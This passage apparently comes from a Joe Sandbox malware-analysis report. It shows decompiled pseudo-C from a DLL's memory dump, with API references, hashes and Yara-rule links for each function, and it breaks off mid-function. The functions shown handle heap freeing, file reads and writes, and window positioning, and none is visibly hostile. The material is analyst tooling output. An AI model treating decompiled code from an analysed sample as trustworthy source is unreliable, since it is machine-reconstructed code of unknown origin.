							_t120 =  *0x1004b0ec; // 0x0
							_t139 =  *0x1004b0e8; // 0x0
							_t121 =  *0x1004b0e0; // 0x0
							 *((intOrPtr*)(_t164 + 0x20))(_t157, 0, (_t59 * _t120 + 1 + _t139 *  *0x1004b0d8 * 0x3fffffff) * _t120 + (_t139 + 1 + _t121 * 0x3fffffff) *  *0x1004b0e4 + 0x2000 + _t121 * 2 - _t59 << 2,  *((intOrPtr*)(_t164 + 0x34)));
						}
						return HeapFree(GetProcessHeap(), 0, _t164);
					} else {
						_t125 =  *0x1004b0e0; // 0x0
						_t159 =  *0x1004b0ec; // 0x0
						_t173 =  *0x1004b0dc; // 0x0
						_t142 =  *0x1004b0d8; // 0x0
						_t61 =  *0x1004b0e4; // 0x0
						_t12 = _t125 + 1; // 0x1
						 *(_t196 + 0x18) = 0;
						if( *((intOrPtr*)(_t164 + 0xc)) - (_t173 * _t142 + _t12 * _t159 + _t61 << 1) <= 0) {
							L8:
							 *0x1004d3e0((_t61 << 4) - ((_t142 * _t142 << 4) + 0x10) * _t159 +  *((intOrPtr*)(_t164 + 8)));
							_t196 = _t196 + 4;
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t96 =  *0x1004b0dc; // 0x0
							_t177 =  *0x1004b0e8; // 0x0
							 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t164 + 8));
							if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)) + ( *(_t196 + 0x18) + ((_t159 - _t96 - 1) * _t125 + _t177 * _t142) * 2 + (_t159 - _t96 - 1) * _t125 + _t177 * _t142) * 4)) != 0) {
								_t189 =  *0x1004b0e4; // 0x0
								_t25 = _t159 - (_t96 *  *0x1004b0e8 + _t189) * _t125 -  *0x1004b0e8 + _t142 - 2; // -268742890
								 *((intOrPtr*)(_t164 + 0x2c))( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x14)) + ((_t125 - (_t142 * _t142 << 1) + _t125 + 2) *  *0x1004b0e4 +  *((intOrPtr*)(_t196 + 0x1c)) + (_t159 - (_t96 *  *0x1004b0e8 + _t189) * _t125 -  *0x1004b0e8 + _t142 + _t25) * _t96 + (_t159 + 1) * _t125 * 2) * 4)),  *((intOrPtr*)(_t164 + 0x34)));
								_t142 =  *0x1004b0d8; // 0x0
								_t159 =  *0x1004b0ec; // 0x0
								_t125 =  *0x1004b0e0; // 0x0
								_t96 =  *0x1004b0dc; // 0x0
								_t196 = _t196 + 8;
							}
							_t61 =  *0x1004b0e4; // 0x0
							 *(_t196 + 0x18) =  *(_t196 + 0x18) + 1;
							_t37 = _t125 + 1; // 0x1
						} while ( *(_t196 + 0x18) <  *((intOrPtr*)(_t164 + 0xc)) - (_t96 * _t142 + _t37 * _t159 + _t61 << 1));
						goto L8;
					}
				}
				return _t51;
			}

APIs

??3@YAXPAX@Z.MSVCRT ref: 10004E6C
??3@YAXPAX@Z.MSVCRT ref: 10004FB4
GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 10005028
HeapFree.KERNEL32(00000000), ref: 1000502F

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ??3@Heap$FreeProcess
String ID:
API String ID: 834397476-0
Opcode ID: 391aa570712f7e89dbfeb0fca8f603a18ca8548013477e7103293fc6906814a1
Instruction ID: 9f87828e50faab3a5d058e3d57900a61c1aef8edd5c1bc6d424dad7412e7468d
Opcode Fuzzy Hash: 391aa570712f7e89dbfeb0fca8f603a18ca8548013477e7103293fc6906814a1
Instruction Fuzzy Hash: 94719631200B158FE318DF6CCEC5A57B7A9FB89341B05C52ED926CB7A5E670E905CB48

Uniqueness

Uniqueness Score: -1.00%

Function 1001B36C Relevance: 6.2, APIs: 4, Instructions: 167
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001B36C(signed int _a4, signed int _a8, long _a12) {
				void _v5;
				signed int _v12;
				long _v16;
				signed int _t79;
				void* _t82;
				signed int _t86;
				signed int* _t89;
				long _t90;
				void* _t92;
				intOrPtr _t93;
				signed int _t97;
				intOrPtr _t98;
				char _t100;
				signed int _t101;
				long _t103;
				long _t106;
				signed int _t107;
				signed int _t113;
				signed int _t114;
				signed char _t117;
				intOrPtr _t118;
				long _t120;
				void* _t124;
				intOrPtr* _t125;
				signed int _t127;
				signed char* _t128;
				void* _t129;
				void* _t130;

				_v12 = _v12 & 0x00000000;
				_t113 = _a8;
				_t124 = _t113;
				if(_a12 == 0) {
					L42:
					__eflags = 0;
					return 0;
				}
				_t79 = _a4;
				_t125 = 0x1004f920 + (_t79 >> 5) * 4;
				_t127 = (_t79 & 0x0000001f) + (_t79 & 0x0000001f) * 8 << 2;
				_t82 =  *_t125 + _t127;
				_t117 =  *((intOrPtr*)(_t82 + 4));
				if((_t117 & 0x00000002) != 0) {
					goto L42;
				}
				if((_t117 & 0x00000048) != 0 &&  *((char*)(_t82 + 5)) != 0xa) {
					_a12 = _a12 - 1;
					 *_t113 =  *((intOrPtr*)( *_t125 + _t127 + 5));
					_t124 = _t113 + 1;
					_v12 = 1;
					 *((char*)( *_t125 + _t127 + 5)) = 0xa;
				}
				if(ReadFile( *( *_t125 + _t127), _t124, _a12,  &_v16, 0) != 0) {
					_t86 = _v16;
					_t118 =  *_t125;
					_v12 = _v12 + _t86;
					__eflags =  *(_t118 + _t127 + 4) & 0x00000080;
					if(( *(_t118 + _t127 + 4) & 0x00000080) == 0) {
						L41:
						return _v12;
					}
					__eflags = _t86;
					if(_t86 == 0) {
						L15:
						_t89 =  *_t125 + _t127 + 4;
						 *_t89 =  *_t89 & 0x000000fb;
						__eflags =  *_t89;
						L16:
						_t90 = _a8;
						_t120 = _v12 + _t90;
						__eflags = _t90 - _t120;
						_a12 = _t90;
						_v12 = _t120;
						if(_t90 >= _t120) {
							L40:
							_t114 = _t113 - _a8;
							__eflags = _t114;
							_v12 = _t114;
							goto L41;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t92 =  *_a12;
							__eflags = _t92 - 0x1a;
							if(_t92 == 0x1a) {
								break;
							}
							__eflags = _t92 - 0xd;
							if(_t92 == 0xd) {
								__eflags = _a12 - _t120 - 1;
								if(_a12 >= _t120 - 1) {
									_a12 = _a12 + 1;
									_t97 = ReadFile( *( *_t125 + _t127),  &_v5, 1,  &_v16, 0);
									__eflags = _t97;
									if(_t97 != 0) {
										L26:
										__eflags = _v16;
										if(_v16 == 0) {
											L34:
											 *_t113 = 0xd;
											L35:
											_t113 = _t113 + 1;
											__eflags = _t113;
											L36:
											_t120 = _v12;
											__eflags = _a12 - _t120;
											if(_a12 < _t120) {
												continue;
											}
											goto L40;
										}
										_t98 =  *_t125;
										__eflags =  *(_t98 + _t127 + 4) & 0x00000048;
										if(( *(_t98 + _t127 + 4) & 0x00000048) == 0) {
											__eflags = _t113 - _a8;
											if(__eflags != 0) {
												L33:
												E1001968C(__eflags, _a4, 0xffffffff, 1);
												_t130 = _t130 + 0xc;
												__eflags = _v5 - 0xa;
												if(_v5 == 0xa) {
													goto L36;
												}
												goto L34;
											}
											__eflags = _v5 - 0xa;
											if(__eflags != 0) {
												goto L33;
											}
											L32:
											 *_t113 = 0xa;
											goto L35;
										}
										_t100 = _v5;
										__eflags = _t100 - 0xa;
										if(_t100 == 0xa) {
											goto L32;
										}
										 *_t113 = 0xd;
										 *((char*)( *_t125 + _t127 + 5)) = _t100;
										goto L35;
									}
									_t101 = GetLastError();
									__eflags = _t101;
									if(_t101 != 0) {
										goto L34;
									}
									goto L26;
								}
								_t103 = _a12 + 1;
								__eflags =  *_t103 - 0xa;
								if( *_t103 != 0xa) {
									_a12 = _t103;
									goto L34;
								}
								_a12 = _a12 + 2;
								goto L32;
							}
							 *_t113 = _t92;
							_t113 = _t113 + 1;
							_a12 = _a12 + 1;
							goto L36;
						}
						_t93 =  *_t125;
						__eflags =  *(_t93 + _t127 + 4) & 0x00000040;
						if(( *(_t93 + _t127 + 4) & 0x00000040) == 0) {
							_t128 = _t93 + _t127 + 4;
							 *_t128 =  *_t128 | 0x00000002;
							__eflags =  *_t128;
						}
						goto L40;
					}
					__eflags =  *_t113 - 0xa;
					if( *_t113 != 0xa) {
						goto L15;
					}
					 *(_t118 + _t127 + 4) =  *(_t118 + _t127 + 4) | 0x00000004;
					goto L16;
				} else {
					_t106 = GetLastError();
					_t129 = 5;
					if(_t106 != _t129) {
						__eflags = _t106 - 0x6d;
						if(_t106 == 0x6d) {
							goto L42;
						}
						_t107 = E10013707(_t106);
						L10:
						return _t107 | 0xffffffff;
					}
					 *((intOrPtr*)(E100136F5())) = 9;
					_t107 = E100136FE();
					 *_t107 = _t129;
					goto L10;
				}
			}

APIs

ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 1001B3E6
GetLastError.KERNEL32(?,?,?), ref: 1001B3F0
ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 1001B4B9
GetLastError.KERNEL32(?,?,?), ref: 1001B4C3

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 1586ebca8aaa9a6ea4319f4853b1feeec289fced979c0bdf45d6e5b6f0657abd
Instruction ID: 3bbfbaef22ec515d269d62fd47d355a82d48074a4c8ee7a64ff4f0343116150f
Opcode Fuzzy Hash: 1586ebca8aaa9a6ea4319f4853b1feeec289fced979c0bdf45d6e5b6f0657abd
Instruction Fuzzy Hash: DB61D374A04B89DFDB21CFA8C880B997BF0EF05354F158099E9618F2A2D770DAC1CB11

Uniqueness

Uniqueness Score: -1.00%

Function 1000E58F Relevance: 6.2, APIs: 4, Instructions: 165
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E1000E58F(void* __ecx, void* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr* _t62;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t84;
				void* _t107;
				void* _t126;
				intOrPtr _t130;
				intOrPtr* _t131;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t135;
				intOrPtr _t136;
				void* _t137;

				_t126 = __edx;
				_t135 = __ecx;
				_t130 = E10023092( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + 0x24)));
				_v12 = _t130;
				_t58 = IsWindowVisible( *(_t130 + 0x1c));
				asm("sbb eax, eax");
				_t60 =  ~_t58 + 1;
				_v24 = _t60;
				_t107 = 0;
				if(_t60 != 0) {
					GetWindowRect( *(E100220EE(_t137, GetDesktopWindow()) + 0x1c),  &_v56);
					GetWindowRect( *(_t130 + 0x1c),  &_v40);
					asm("cdq");
					asm("cdq");
					E1002036F(_t130, _v56.right - _v56.left - _t126 >> 1, _v56.bottom - _v56.top - _t126 >> 1, _t107, _t107, _t107);
					E100203AD(_t130, 1);
				}
				_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 4)) + 0x4c));
				_t131 = _t135 + 0x48;
				_push(_t131);
				_push(0x100405f8);
				_push(_t62);
				if( *((intOrPtr*)( *_t62))() < 0) {
					_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 4)) + 0x4c));
					_t66 =  *((intOrPtr*)( *_t65))(_t65, 0x10040550,  &_v16);
					if(_t66 >= _t107) {
						_t67 = _v16;
						 *((intOrPtr*)( *_t67 + 0x14))(_t67,  &_v20);
						_t69 = _v16;
						 *((intOrPtr*)( *_t69 + 8))(_t69);
						_t71 = _v20;
						if(_t71 != _t107) {
							_t133 = _t135 + 8;
							_v8 =  *((intOrPtr*)( *_t71))(_t71, 0x10042ff8, _t133);
							_t73 = _v20;
							 *((intOrPtr*)( *_t73 + 8))(_t73);
							_t66 = _v8;
							if(_t66 >= _t107) {
								_t134 =  *_t133;
								 *((intOrPtr*)( *_t134))(_t134, 0x10042fe8, _t135 + 0xc);
								goto L14;
							}
						} else {
							_t66 = 0x80004005;
						}
					}
				} else {
					_t84 =  *_t131;
					_t134 = _t135 + 0x4c;
					_v8 =  *((intOrPtr*)( *_t84 + 0xc))(_t84, _t107, 0x10043298, _t134);
					if( *_t134 == _t107) {
						_v8 = 0x80004003;
					}
					if(_v8 >= _t107) {
						L14:
						_t136 = E1000E14F(_t107, _t135, _t134, _t135);
						if(_v24 != _t107) {
							E1002036F(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
							E100203AD(_v12, _t107);
						}
						_t66 = _t136;
					} else {
						if(_v24 != _t107) {
							E1002036F(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
							E100203AD(_v12, _t107);
						}
						_t66 = _v8;
					}
				}
				return _t66;
			}

APIs

IsWindowVisible.USER32 ref: 1000E5AD
GetDesktopWindow.USER32 ref: 1000E5C0
GetWindowRect.USER32 ref: 1000E5D3
GetWindowRect.USER32 ref: 1000E5E0

Part of subcall function 1002036F: MoveWindow.USER32(?,?,?,00000000,?,00000000,?,1000E721,?,?), ref: 1002038A

Part of subcall function 100203AD: ShowWindow.USER32(?,?,1000E72A,00000000,?,?), ref: 100203BA

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Rect$DesktopMoveShowVisible
String ID:
API String ID: 3835705305-0
Opcode ID: deebbd18c64334d53d6a070cc2f7cf5956eb5d0ae01d3c8a610755a7333daa4e
Instruction ID: 525efb47f72b729c7b32d6b473f79529eff02a82a59350a91d8b9bca58045246
Opcode Fuzzy Hash: deebbd18c64334d53d6a070cc2f7cf5956eb5d0ae01d3c8a610755a7333daa4e
Instruction Fuzzy Hash: F351D875A0020AAFDB00DFA8DD84CAEB7BAFF48345B154459F646E7255CB31BE41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 100197AB Relevance: 6.1, APIs: 4, Instructions: 145
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100197AB(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t68;
				void** _t73;
				signed int _t74;
				long _t76;
				intOrPtr _t79;
				signed int _t81;
				char* _t86;
				int _t91;
				long _t93;
				intOrPtr* _t100;
				void* _t102;
				signed int _t107;
				char _t110;
				struct _OVERLAPPED* _t112;
				long _t115;
				signed int _t118;
				struct _OVERLAPPED* _t120;
				void* _t121;
				void* _t123;

				_t121 = _t123 - 0x3a0;
				_t68 =  *0x1004c470; // 0x12db9c4b
				_t112 = 0;
				 *((intOrPtr*)(_t121 + 0x39c)) = _t68;
				 *(_t121 - 0x78) = 0;
				 *((intOrPtr*)(_t121 - 0x7c)) = 0;
				if( *(_t121 + 0x3b0) != 0) {
					_t100 = 0x1004f920 + ( *(_t121 + 0x3a8) >> 5) * 4;
					_t118 = ( *(_t121 + 0x3a8) & 0x0000001f) + ( *(_t121 + 0x3a8) & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t100 + _t118 + 4) & 0x00000020;
					if(__eflags != 0) {
						E1001B190(_t102, __eflags,  *(_t121 + 0x3a8), 0, 0, 2);
					}
					_t73 =  *_t100 + _t118;
					__eflags = _t73[1] & 0x00000080;
					if((_t73[1] & 0x00000080) == 0) {
						_t74 = WriteFile( *_t73,  *(_t121 + 0x3ac),  *(_t121 + 0x3b0), _t121 - 0x80, _t112);
						__eflags = _t74;
						if(_t74 == 0) {
							 *(_t121 - 0x6c) = GetLastError();
						} else {
							 *(_t121 - 0x6c) = _t112;
							 *(_t121 - 0x78) =  *(_t121 - 0x80);
						}
					} else {
						__eflags =  *(_t121 + 0x3b0) - _t112;
						 *(_t121 - 0x74) =  *(_t121 + 0x3ac);
						 *(_t121 - 0x6c) = _t112;
						if( *(_t121 + 0x3b0) <= _t112) {
							L25:
							_t79 =  *_t100;
							__eflags =  *(_t79 + _t118 + 4) & 0x00000040;
							if(( *(_t79 + _t118 + 4) & 0x00000040) == 0) {
								L28:
								 *((intOrPtr*)(E100136F5())) = 0x1c;
								_t81 = E100136FE();
								 *_t81 = _t112;
								L29:
								_t77 = _t81 | 0xffffffff;
								L31:
								goto L32;
							}
							__eflags =  *( *(_t121 + 0x3ac)) - 0x1a;
							if( *( *(_t121 + 0x3ac)) != 0x1a) {
								goto L28;
							}
							_t77 = 0;
							goto L31;
						} else {
							goto L6;
						}
						do {
							L6:
							_t107 =  *(_t121 - 0x74) -  *(_t121 + 0x3ac);
							__eflags = _t107;
							_t86 = _t121 - 0x68;
							 *(_t121 - 0x70) = _t112;
							do {
								__eflags = _t107 -  *(_t121 + 0x3b0);
								if(_t107 >=  *(_t121 + 0x3b0)) {
									break;
								}
								 *(_t121 - 0x74) =  *(_t121 - 0x74) + 1;
								_t110 =  *( *(_t121 - 0x74));
								_t107 = _t107 + 1;
								__eflags = _t110 - 0xa;
								if(_t110 == 0xa) {
									 *((intOrPtr*)(_t121 - 0x7c)) =  *((intOrPtr*)(_t121 - 0x7c)) + 1;
									 *_t86 = 0xd;
									_t86 = _t86 + 1;
									_t34 = _t121 - 0x70;
									 *_t34 =  &( *(_t121 - 0x70)->Internal);
									__eflags =  *_t34;
								}
								 *_t86 = _t110;
								_t86 = _t86 + 1;
								 *(_t121 - 0x70) =  &( *(_t121 - 0x70)->Internal);
								__eflags =  *(_t121 - 0x70) - 0x400;
							} while ( *(_t121 - 0x70) < 0x400);
							_t115 = _t86 - _t121 - 0x68;
							_t91 = WriteFile( *( *_t100 + _t118), _t121 - 0x68, _t115, _t121 - 0x80, 0);
							__eflags = _t91;
							if(_t91 == 0) {
								 *(_t121 - 0x6c) = GetLastError();
								L16:
								_t112 = 0;
								__eflags = 0;
								L17:
								_t76 =  *(_t121 - 0x78);
								__eflags = _t76 - _t112;
								if(_t76 != _t112) {
									_t77 = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
									__eflags = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
									goto L31;
								}
								__eflags =  *(_t121 - 0x6c) - _t112;
								if( *(_t121 - 0x6c) == _t112) {
									goto L25;
								}
								_t120 = 5;
								__eflags =  *(_t121 - 0x6c) - _t120;
								if( *(_t121 - 0x6c) != _t120) {
									_t81 = E10013707( *(_t121 - 0x6c));
								} else {
									 *((intOrPtr*)(E100136F5())) = 9;
									_t81 = E100136FE();
									 *_t81 = _t120;
								}
								goto L29;
							}
							_t93 =  *(_t121 - 0x80);
							 *(_t121 - 0x78) =  *(_t121 - 0x78) + _t93;
							__eflags = _t93 - _t115;
							if(_t93 < _t115) {
								goto L16;
							}
							_t112 = 0;
							__eflags =  *(_t121 - 0x74) -  *(_t121 + 0x3ac) -  *(_t121 + 0x3b0);
						} while ( *(_t121 - 0x74) -  *(_t121 + 0x3ac) <  *(_t121 + 0x3b0));
					}
					goto L17;
				} else {
					_t77 = 0;
					L32:
					return E100117AE(_t77,  *((intOrPtr*)(_t121 + 0x39c)));
				}
			}

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000000,1004C878,00000001), ref: 10019893

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 965eb31f54da86365c2da1447df739003087db675420f9f90e2f522ac335ea6e
Instruction ID: bcb25415e8510b231303bc6364b9eff1bf1e0548ad7273a78b3d91e774eab1a2
Opcode Fuzzy Hash: 965eb31f54da86365c2da1447df739003087db675420f9f90e2f522ac335ea6e
Instruction Fuzzy Hash: AD513671900298DFDB22CFA9C880ADDBBF8FF46744F21411AE9599F256DB309A81CF11

Uniqueness

Uniqueness Score: -1.00%

Function 1003078E Relevance: 6.1, APIs: 4, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1003078E(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _t76;
				int _t78;
				intOrPtr _t83;
				intOrPtr _t102;
				int _t116;
				void* _t124;
				void* _t128;
				intOrPtr _t133;
				void* _t135;
				void* _t139;

				_t135 = __edi;
				_t124 = __ecx;
				_t76 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t128 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_t133 =  *((intOrPtr*)(__ecx + 0x8c));
				_t139 = 2;
				if(_t133 == 0xa) {
					L7:
					 *((intOrPtr*)(_t124 + 0x28)) =  *((intOrPtr*)(_t124 + 0x28)) + _t76;
					L9:
					_t78 =  *((intOrPtr*)(_t124 + 0x30)) -  *((intOrPtr*)(_t124 + 0x28));
					__eflags = _t78;
					L10:
					if(_t78 < 0) {
						_t78 = 0;
					}
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x68)))) + 0x134))( &_v12, _t78, _t139, _t135);
					GetWindowRect(GetDesktopWindow(),  &_v44);
					_t83 =  *((intOrPtr*)(_t124 + 0x8c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if(_t83 == 0xa || _t83 == 0xc) {
						_v28.left = _v28.right -  *((intOrPtr*)(_t124 + 0x60)) - _v12 +  *((intOrPtr*)(_t124 + 0x58));
						_v28.top =  *((intOrPtr*)(_t124 + 0x5c)) -  *((intOrPtr*)(_t124 + 0x64)) - _v8 + _v28.bottom;
						__eflags = IntersectRect( &_v60,  &_v44,  &_v28);
						if(__eflags != 0) {
							 *((intOrPtr*)(_t124 + 0x38)) =  *((intOrPtr*)(_t124 + 0x40)) - _v12;
							_t102 =  *((intOrPtr*)(_t124 + 0x44)) - _v8;
							__eflags = _t102;
							 *((intOrPtr*)(_t124 + 0x3c)) = _t102;
							 *(_t124 + 0x48) = _v28.left;
							 *((intOrPtr*)(_t124 + 0x4c)) = _v28.top;
						}
					} else {
						_v28.right =  *((intOrPtr*)(_t124 + 0x60)) -  *((intOrPtr*)(_t124 + 0x58)) + _v28.left + _v12;
						_v28.bottom =  *((intOrPtr*)(_t124 + 0x64)) -  *((intOrPtr*)(_t124 + 0x5c)) + _v28.top + _v8;
						_t116 = IntersectRect( &_v60,  &_v44,  &_v28);
						_t149 = _t116;
						if(_t116 != 0) {
							 *((intOrPtr*)(_t124 + 0x40)) =  *((intOrPtr*)(_t124 + 0x38)) + _v12;
							 *((intOrPtr*)(_t124 + 0x44)) =  *((intOrPtr*)(_t124 + 0x3c)) + _v8;
							 *((intOrPtr*)(_t124 + 0x50)) = _v28.right;
							 *((intOrPtr*)(_t124 + 0x54)) = _v28.bottom;
						}
					}
					 *((intOrPtr*)(_t124 + 4)) = _a4;
					 *((intOrPtr*)(_t124 + 8)) = _a8;
					return E10030582(_t124, _t149, 0);
				}
				if(_t133 == 0xb) {
					__eflags = _t133 - 0xa;
					if(_t133 != 0xa) {
						_t14 = __ecx + 0x30;
						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t76;
						__eflags =  *_t14;
						goto L9;
					}
					goto L7;
				} else {
					_t139 = 0x22;
					if(_t133 != 0xc) {
						_t8 = __ecx + 0x34;
						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t128;
						__eflags =  *_t8;
					} else {
						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t128;
					}
					_t78 =  *((intOrPtr*)(_t124 + 0x34)) -  *((intOrPtr*)(_t124 + 0x2c));
					goto L10;
				}
			}

APIs

GetDesktopWindow.USER32 ref: 100307FE
GetWindowRect.USER32 ref: 10030809
IntersectRect.USER32 ref: 10030854
IntersectRect.USER32 ref: 100308A8

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Rect$IntersectWindow$Desktop
String ID:
API String ID: 123605412-0
Opcode ID: 798443665cb7e1b579a2a184bcc2e050a0f8e43ff96723420b6623ef63c5f40a
Instruction ID: 610273ea94d3692e70733b76c969e3fbb3ef96a28992a3e324fe7b4179401a7e
Opcode Fuzzy Hash: 798443665cb7e1b579a2a184bcc2e050a0f8e43ff96723420b6623ef63c5f40a
Instruction Fuzzy Hash: D2516076A012099FCB45DFACC5D5A9E7BF8FF08355F148195E905EB20AE630E980CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 10024838 Relevance: 6.1, APIs: 4, Instructions: 115
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10024838(void* __ebx, void** __ecx, void* __edi, void* __esi, char* _a4, short _a8) {
				intOrPtr _v8;
				short _v72;
				signed int _v76;
				signed int _v80;
				void** _v84;
				signed int _v88;
				intOrPtr _t52;
				short* _t65;
				void* _t74;
				short* _t81;
				void* _t86;
				char* _t92;
				signed int _t93;
				signed int* _t95;
				void** _t96;
				signed int _t101;
				signed int _t103;
				void* _t106;

				_t52 =  *0x1004c470; // 0x12db9c4b
				_v8 = _t52;
				_v84 = __ecx;
				if(__ecx[1] != 0) {
					_t95 = GlobalLock( *__ecx);
					_v80 = 0 | _t95[0] == 0x0000ffff;
					_v76 = E100246AB(_t95);
					_t101 = (0 | _v80 != 0x00000000) + (0 | _v80 != 0x00000000) + 1 << 1;
					_v88 = _t101;
					if(_v80 == 0) {
						 *_t95 =  *_t95 | 0x00000040;
					} else {
						_t95[3] = _t95[3] | 0x00000040;
					}
					if(lstrlenA(_a4) < 0x20) {
						_a4 = _t101 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v72, 0x20) * 2;
						_t65 = E1002472A(_t95);
						_t86 = 0;
						_t81 = _t65;
						if(_v76 != 0) {
							_t86 = _t101 + 2 + E100124FC(_t81 + _t101) * 2;
						}
						_t92 = _a4;
						_t31 = _t81 + 3; // 0x3
						_t33 = _t92 + 3; // 0x3
						_t67 = _t86 + _t31 & 0xfffffffc;
						_t103 = _t81 + _t33 & 0xfffffffc;
						_v76 = _t86 + _t31 & 0xfffffffc;
						if(_v80 == 0) {
							_t93 = _t95[2];
						} else {
							_t93 = _t95[4];
						}
						if(_a4 != _t86 && _t93 > 0) {
							E100118B0(_t103, _t67, _t95 - _t67 + _v84[1]);
							_t106 = _t106 + 0xc;
						}
						 *_t81 = _a8;
						E100118B0(_t81 + _v88,  &_v72, _a4 - _v88);
						_t96 = _v84;
						_t96[1] = _t96[1] + _t103 - _v76;
